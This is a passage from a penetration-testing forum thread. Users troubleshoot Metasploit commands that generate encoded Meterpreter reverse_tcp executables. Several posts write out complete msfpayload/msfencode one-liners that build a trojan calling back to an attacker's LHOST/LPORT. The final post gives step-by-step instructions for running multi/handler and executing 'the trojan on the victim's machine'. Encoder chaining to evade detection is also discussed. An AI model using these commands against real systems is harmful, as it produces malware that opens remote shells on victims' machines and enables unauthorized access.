Page 1 of 2 12 LastLast
Results 1 to 10 of 15

Thread: ./msfencode ?

  1. #1
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default ./msfencode ?

    .i'm trieing to look back at the phoenix910 post, it's about encoding the payload ,meterpreter reverse_tcp and executing it on the victime box

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=5555 R | ./msfencode -b '' -t exe -o output.exe

    .no problem with bt3 and ./msfencode .the output.exe works fine ,and the victim connect back

    .but the same output.exe that was encoded on the bt4 pre, same command used, it's not working!

    .in the first place i thought it was some problem with the nat or some iptables rulez .but i run packetyzer on the victim box and no packets has been sent, no connection tried

    .tried with updated msf but no good.
    .the funny part is ,that the old output.exe that was encoded on a bt3 works on the victim box and connect back to bt4pre, with multi/handler started ,with the options set (LHOST=192.168.1.2 LPORT=5555)
    .that could be the problem with the encoder or something, maybe ruby lib.s
    .any ideas?

  2. #2
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    .is there someone who managed to use ./msfencode successfully, on bt4pre? .to get the working executible file.

    .i'll be thankfull for any response ,'cause i tried with the outher encoders supported my msf, but no results

  3. #3
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Default

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=11.11.11.11 LPORT=4444 R | ./msfencode -e x86/countdown -t raw | ./msfencode -t exe -o /revpayload.exe

  4. #4
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    .ecsployt thank's for the replay .it's a good combinations, but i still got the same problem .hm not the same exactly 'cause i menaged to encode the working output.exe but after 100 atemps
    .useing the very same command on the livecd on the vmware .it's so confusing couse i install the bt from that livecd after the success and when i tried again to make working exe ,no good it's not working .then i tried to boot form livecd again and do the same thing .it's not working !

    .i tried so many things .reinstalling ruby framework bt, booting from iso, livecd etc. ( X > output.exe without encoder, nothing)
    And all i can make up with is that this is some kind of problem related with wmware. It is little frustrating cause i was working on this for 5days and resolts are 'in most casess encoded output.exe is not working but u can reboot and try again'

    .I don't wana be boring, maybe i's time for me to make a new settup on my box, reinstall vmware...
    .so if anyone has a extra minut to try... help

  5. #5
    Junior Member
    Join Date
    Dec 2007
    Posts
    76

    Default

    I'm not sure what your problem may be. If your thinking about reinstalling bt4pre to a virtual machine, why dont you try virtual box instead. I'm using that, and it's really good. And open source. The added tools install without a problem to bt4pre as well.

    Sorry i can't be of more help.

  6. #6
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    .this is just crazy!!!
    .yesterday i remove my destkop distro and install BT-pre on my box .why not, it's a full distro now and i'm spendig so much time on it .everthing works just fine
    .i have vmware 6.5.2 now on bt
    .6.5.0 was on my last distro

    .but, guess what ??
    First thing i did was .lunching vmware, install xpsp1 and xpsp2 and boot the bt-pre under vmware .i just couldn't wait to see the line "meterpreter>"
    .f*k !!!!!!!! the output.exe encoded on bt4-pre (running under vmware) ,is not working!!! something is wrong here.

    .i encode the same one on my desktop bt4-pre ,main distro now (vmware is running on it)
    .it's working and i get my daily dose of meterpreter

    .well i'm gone try to run those not working exe in the presence of debugger and see what the hell is wrong with them
    .any suggetion?

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,126

    Default

    Starting every sentence with a period does not speak well for you computer skills.

  8. #8
    Junior Member loop4me's Avatar
    Join Date
    Mar 2008
    Posts
    54

    Default

    .well i'm working onto improve my computer skills .so pureh@te ,really appreciate your help

  9. #9
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    try fast-track... there is a option to create the executable with fast track. by default msfpayload uses shakanaga encoder unless if told other wise...

    ./msfpayload -h
    ./msfencoder -h

    search threw my resent post, i posted lots of info on this subject and a few others contributed to the thread...

  10. #10
    Just burned his ISO
    Join Date
    Jun 2009
    Posts
    2

    Default

    BT4? Do it like this under root:
    ./msfpayload windows/meterpreter/reverse_tcp lhost=[your ip] lport=[port] R | ./msfencode -e x86/fnstenv_mov -t exe > metatrojan.exe

    Run multi/handler, and set payload as windows/meterpreter/reverse_tcp. And then execute the trojan on the victim's machine, it should connect.

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •